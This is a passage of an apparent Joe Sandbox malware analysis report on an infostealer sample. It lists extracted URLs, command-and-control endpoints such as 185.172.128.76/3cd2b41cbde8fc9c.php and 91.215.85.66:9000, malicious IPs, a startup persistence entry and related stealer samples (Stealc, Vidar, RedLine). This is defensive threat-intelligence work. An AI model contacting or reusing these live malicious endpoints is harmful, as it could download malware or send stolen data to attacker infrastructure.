                                                                                                              http://gdlp01.c-wss.com/rmds/ic/universalinstaller/common/checkconnectionQg_Appv5.exe, 00000004.00000002.2307968581.0000000007071000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2242409589.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000000.2235272008.00000000004EC000.00000002.00000001.01000000.0000000E.sdmp, UniversalInstaller.exe, 00000006.00000000.2240945975.000000000110C000.00000002.00000001.01000000.00000010.sdmp, UniversalInstaller.exe, 00000006.00000002.2307212182.000000000110C000.00000002.00000001.01000000.00000010.sdmpfalse
                                                                                                                		high
                                                                                                                https://www.ecosia.org/newtab/u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://ocsp.sectigo.com0&4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    		low
                                                                                                                    http://www.symauth.com/cps0(Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://185.172.128.76/3cd2b41cbde8fc9c.phpntsu3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        		unknown
                                                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-bru3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://dejavu.sourceforge.nethttp://dejavu.sourceforge.netFontsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                            		unknown
                                                                                                                            https://iolo.comH42652B74-0AD8-4B60-B8FD-69ED38F7666BSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		unknown
                                                                                                                              https://dc.services.visualstudio.com/fSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://91.215.85.66:9000/wbinjget?q=9F196B497BDFD0CED832D4AB8AAC3B4FMSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		unknown
                                                                                                                                  https://support.iolo.com/support/solutions/articles/44SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37CB9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://www.symauth.com/rpa00Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://185.172.128.76/3cd2b41cbde8fc9c.php)u3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        		unknown
                                                                                                                                        https://www.newtonsoft.com/jsonschemaSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://support.mozilla.org/products/firefoxgro.allizom.troppus.GVegJq3nFfBLu3z0.0.exe, 00000002.00000003.2203177819.00000000309CF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://www.info-zip.org/Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.000000000348F000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B1D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005318000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.iolo.com/company/legal/eula/?SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://185.172.128.76u3z0.0.exe, 00000002.00000002.2435497430.00000000043DE000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                  		unknown
                                                                                                                                                  http://dejavu.sourceforge.net/wiki/index.php/LicenseSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://scripts.sil.org/OFLThisSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      https://scripts.sil.org/OFLinsSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3450053584.0000013E4FE40000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://github.com/itfoundry/Poppins)&&&&zSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://github.com/itfoundry/Poppins)SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://185.172.128.76/3cd2b41cbde8fc9c.phpAu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		unknown
                                                                                                                                                              https://github.com/itfoundry/Poppins)&&&&vSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3463758069.0000013E50390000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                http://ocsp.sectigo.com04BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmp, 4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                		unknown
                                                                                                                                                                http://185.172.128.76/15f649199f40275b/softokn3.dllcu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		unknown
                                                                                                                                                                  https://www.iolo.com/company/legal/eula/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://www.newtonsoft.com/jsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=u3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        • URL Reputation: safe
                                                                                                                                                                        		unknown
                                                                                                                                                                        http://google.com4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006B31000.00000004.00000020.00020000.00000000.sdmp, u3z0.1.exe, 00000009.00000000.2257557220.000000000041C000.00000020.00000001.01000000.00000012.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          http://185.172.128.76/3cd2b41cbde8fc9c.php-minuser-l1-1-0u3z0.0.exe, 00000002.00000002.2435664162.0000000004402000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		unknown
                                                                                                                                                                            http://www.codeplex.com/prismSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              http://185.172.128.76/3cd2b41cbde8fc9c.phpau3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		unknown
                                                                                                                                                                                http://crl.thawte.com/ThawteTimestampingCA.crl0Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://westus2-2.in.applicationinsights.azure.com/;LiveEndpoint=https://westus2.livediagnostics.monSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3311609654.0000013E37561000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phpfu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		unknown
                                                                                                                                                                                      http://compositewpf.codeplex.com/SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3445939052.0000013E4FD20000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://sectigo.com/CPS0D4BfhCycV4B.exe, 00000000.00000003.2263644143.0000000006F1D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          • URL Reputation: safe
                                                                                                                                                                                          		unknown
                                                                                                                                                                                          http://185.172.128.76/3cd2b41cbde8fc9c.phpMu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		unknown
                                                                                                                                                                                            https://dc.services.visualstudio.com/Jhttps://rt.services.visualstudio.com/Fhttps://profiler.monitorSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://dejavu.sourceforge.net/wiki/index.php/Licensehttp://dejavu.sourceforge.net/wiki/index.php/LicSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3451850676.0000013E4FF10000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                http://185.172.128.76/3cd2b41cbde8fc9c.phpQu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		unknown
                                                                                                                                                                                                  http://185.172.128.76/3cd2b41cbde8fc9c.phpYu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                    https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe.06u3z0.1.exe, 00000009.00000003.2649676502.0000000002664000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                      http://www.sqlite.org/copyright.html.u3z0.0.exe, 00000002.00000002.2468091065.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp, u3z0.0.exe, 00000002.00000002.2454180146.000000001E780000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://github.com/JamesNK/Newtonsoft.JsonSystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3457587705.0000013E50160000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          http://91.215.85.66:9000MSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://sectigo.com/CPS04BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                            • URL Reputation: safe
                                                                                                                                                                                                            		unknown
                                                                                                                                                                                                            https://www.google.com/images/branding/product/ico/googleg_lodp.icoMSBuild.exe, 00000012.00000002.3394791765.00000000043DE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                              		high
                                                                                                                                                                                                              https://github.com/microsoft/ApplicationInsights-dotnet/issues/2560SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 00000013.00000002.3446743934.0000013E4FD50000.00000004.08000000.00040000.00000000.sdmpfalse
                                                                                                                                                                                                                		high
                                                                                                                                                                                                                http://ocsp.thawte.com0Qg_Appv5.exe, 00000004.00000002.2307968581.00000000072CA000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000003.2239443076.0000000003E79000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#4BfhCycV4B.exe, 00000000.00000003.2197046081.000000000732F000.00000004.00000020.00020000.00000000.sdmp, Qg_Appv5.exe, 00000004.00000002.2290860423.0000000004FF3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                • URL Reputation: safe
                                                                                                                                                                                                                		unknown
                                                                                                                                                                                                                http://www.vmware.com/0/Qg_Appv5.exe, 00000004.00000002.2307968581.0000000007315000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000005.00000002.2244250697.00000000034E5000.00000004.00000020.00020000.00000000.sdmp, UniversalInstaller.exe, 00000006.00000002.2308308308.0000000003B73000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000007.00000002.2530191381.0000000005361000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                  		high
                                                                                                                                                                                                                  http://185.172.128.76/3cd2b41cbde8fc9c.phptu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                    		unknown
                                                                                                                                                                                                                    http://185.172.128.76/3cd2b41cbde8fc9c.phpuu3z0.0.exe, 00000002.00000002.2435664162.0000000004438000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                      		unknown
                                                                                                                                                                                                                      http://185.172.128.76/3cd2b41cbde8fc9c.phpftu3z0.0.exe, 00000002.00000002.2435664162.0000000004457000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                        		unknown
                                                                                                                                                                                                                        https://pastebin.com/raw/z9pYkqPQMSBuild.exe, 00000012.00000002.3318395339.00000000032CC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                                          		high

                                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                          185.172.128.90
                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                          		50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                          185.172.128.228
                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                          		50916NADYMSS-ASRUfalse
                                                                                                                                                                                                                          20.157.87.45
                                                                                                                                                                                                                          		svc.iolo.comUnited States
                                                                                                                                                                                                                          		8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                                                                                                                                                                                                                          91.215.85.66
                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                          		34665PINDC-ASRUtrue
                                                                                                                                                                                                                          185.172.128.76
                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                          		50916NADYMSS-ASRUtrue
                                                                                                                                                                                                                          176.97.76.106
                                                                                                                                                                                                                          		note.padd.cn.comUnited Kingdom
                                                                                                                                                                                                                          		43658INTRAFFIC-ASUAfalse
                                                                                                                                                                                                                          185.172.128.59
                                                                                                                                                                                                                          		unknownRussian Federation
                                                                                                                                                                                                                          		50916NADYMSS-ASRUfalse

                                                                                                                                                                                                                          General Information

                                                                                                                                                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                                                                                                                                                          Analysis ID:1430187
                                                                                                                                                                                                                          Start date and time:2024-04-23 09:27:07 +02:00
                                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                                          Overall analysis duration:0h 12m 45s
                                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                                          Number of analysed new started processes analysed:26
                                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                                          Sample name:4BfhCycV4B.exe
                                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                                          Original Sample Name:71ef0fb3be89dc92fcbe7a6e8e6d6ee8.exe
                                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                                          Classification:mal100.troj.spyw.expl.evad.winEXE@26/78@5/7
                                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                                                                          • Number of executed functions: 110
                                                                                                                                                                                                                          • Number of non-executed functions: 251
                                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 20.12.23.50, 199.232.210.172, 192.229.211.108, 13.85.23.206, 20.190.157.11, 40.126.29.15, 40.126.29.13, 40.126.29.6, 40.126.29.14, 40.126.29.7, 40.126.29.11, 40.126.29.9, 20.3.187.198, 20.42.73.29, 23.33.180.114, 20.9.155.148, 69.164.42.0
                                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, gig-ai-prod-westus2-0.trafficmanager.net, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, sls.update.microsoft.com, gig-ai-prod-wus2-01-app-v4-tag.westus2.cloudapp.azure.com, prod.fs.microsoft.com.akadns.net, glb.sls.prod.dcat.dsp.trafficmanager.net, prdv4a.aadg.msidentity.com, fs.microsoft.com, www.tm.v4.a.prd.aadg.akadns.net, ctldl.windowsupdate.com, wu-bg-shim.trafficmanager.net, login.msa.msidentity.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, www.tm.lg.prod.aadmsa.trafficmanager.net
                                                                                                                                                                                                                          • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing network information.
                                                                                                                                                                                                                          • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                                          09:28:32AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Tzgsecure.lnk
                                                                                                                                                                                                                          09:28:35API Interceptor1x Sleep call for process: cmd.exe modified
                                                                                                                                                                                                                          09:28:35API Interceptor2x Sleep call for process: WerFault.exe modified
                                                                                                                                                                                                                          09:28:46API Interceptor286456x Sleep call for process: MSBuild.exe modified
                                                                                                                                                                                                                          09:29:01API Interceptor32767x Sleep call for process: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe modified

                                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                                          IPs

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          185.172.128.905SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=five&s=ab&sub=0
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                                                                                                                                          V9TdcUeNlV.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
                                                                                                                                                                                                                          JARlqZLmeA.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=seven&s=ab&sub=0
                                                                                                                                                                                                                          YQnYpHhUfM.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=eight&s=ab&sub=0
                                                                                                                                                                                                                          pfXiQ8s0eE.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.90/cpa/ping.php?substr=two&s=ab&sub=0
                                                                                                                                                                                                                          185.172.128.2285SLBlv4aUS.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          XAcuSo8KDa.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          f0FSseHktD.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          wipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          f6pwu0HWXe.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          V9TdcUeNlV.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          JARlqZLmeA.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          YQnYpHhUfM.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe
                                                                                                                                                                                                                          pfXiQ8s0eE.exeGet hashmaliciousMars Stealer, PureLog Stealer, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.172.128.228/BroomSetup.exe

                                                                                                                                                                                                                          Domains

                                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                                          iolo0.b-cdn.netwipOhNpHIG.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 169.150.236.97
                                                                                                                                                                                                                          8OeyVwIM3t.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.243
                                                                                                                                                                                                                          40jnt39QJ2.exeGet hashmaliciousMars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRATBrowse
                                                                                                                                                                                                                          • 185.93.1.251
